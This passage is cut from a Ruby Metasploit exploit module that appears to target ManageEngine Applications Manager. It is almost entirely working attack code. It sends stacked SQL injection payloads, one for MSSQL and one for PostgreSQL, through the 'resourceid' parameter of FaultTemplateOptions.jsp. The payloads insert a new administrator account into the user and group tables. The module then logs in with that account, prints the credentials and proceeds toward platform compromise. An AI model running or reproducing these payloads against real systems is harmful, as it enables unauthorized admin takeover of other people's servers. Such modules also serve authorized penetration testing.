    # Instead of detecting the database type, we can guarantee the vuln by sending a separate query to both.
    # The platform can be linux and possible remotely connected to the MSSQL database. 
    # In the same way platform can be windows and postgresql can be used. 
    # Thats why we are sending two queries. We will check the platform inside.
    @uname = Rex::Text.rand_text_alpha_lower(6)
    uid = rand_text_numeric(3)
    apk = rand_text_numeric(6) 
    @pwd = rand_text_alphanumeric(8+rand(9))
    # MSSQL injection should be prepared with ASCII characters. 
    # Map and join can be used for this.
    @uidCHR = "#{uid.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
    @unameCHR = "#{@uname.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
    @apkCHR = "#{apk.unpack('c*').map{|c| "CHAR(#{c})" }.join('+')}"
    @adm = "CHAR(65)+CHAR(68)+CHAR(77)+CHAR(73)+CHAR(78)" # "ADMIN" CHARs - should not be random
    # PostgreSQL injection query // no need APIKEY
    pg_user =""
    pg_user << "1;insert+into+AM_UserPasswordTable+(userid,username,password)+values+"
    pg_user << "($$#{uid}$$,$$#{@uname}$$,$$#{Rex::Text.md5(@pwd)}$$);"
    pg_user << "insert+into+Am_UserGroupTable+(username,groupname)+values+($$#{@uname}$$,$$ADMIN$$);--+"
    # MSSQL injection query
    ms_user =""
    ms_user << "1 INSERT INTO AM_UserPasswordTable(userid,username,password,apikey) values (#{@uidCHR},"
    ms_user << " #{@unameCHR}, 0x#{Rex::Text.md5(@pwd)}, #{@apkCHR});"
    ms_user << "INSERT INTO AM_UserGroupTable(username,groupname) values (#{@unameCHR}, #{@adm})--"
    # Send SQL queries to both types of database(PostreSQL,MSSQL) with SQLi vuln..
    use_sqli(ms_user, pg_user)

    res = send_request_cgi(
'method'  => 'GET',
'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
    )
    # If the user we sent with queries was created, the login will be successful with new admin user.
    if res && res.code == 200 && res.body.include?('.loginDiv') # css control makes more sense. The application language may not be English.
      @cookie = res.get_cookies
      res = send_request_cgi(
'method'  => 'POST',
'uri'     =>  normalize_uri(target_uri.path, 'j_security_check'),
'cookie'  => @cookie,
'vars_post' => {
'clienttype' => 'html',
'j_username' => @uname,
'j_password' => @pwd
        }
      )

      if res && res.code == 302 && res.body.include?('Redirecting to')
        res = send_request_cgi(
'method'  => 'GET',
'uri'     =>  normalize_uri(target_uri.path, 'applications.do'),
'cookie'  => @cookie
          )
        @cookie = res.get_cookies # last cookie
        return Exploit::CheckCode::Vulnerable
      else
        return Exploit::CheckCode::Safe
      end
    else
      return Exploit::CheckCode::Safe
    end

  end

  def exploit
    unless Exploit::CheckCode::Vulnerable == check
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
    end
    print_good("Excellent! Logged in as #{@uname}")
    print_status("Admin Username => #{@uname}")
    print_status("Admin Password => #{@pwd}")
    check_platform # Start the adventure
  end
##
# Communication with the database
##
  def use_sqli(mssql, postgresql)
    # two different post data must be sent.
    # Because the query structures are different.
    send_request_cgi(
'method'  => 'POST',
'uri'     =>  normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
'vars_post' => {
'resourceid' => mssql
      }
    )
    # important to send the +/$ characters clear
    send_request_cgi(
      {
'method' => 'POST',
'ctype'  => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'jsp', 'FaultTemplateOptions.jsp'),
'data' => "resourceid=#{postgresql}"
      }, 25)

  end
end
##
# The end of the codes (o_O) // AkkuS
##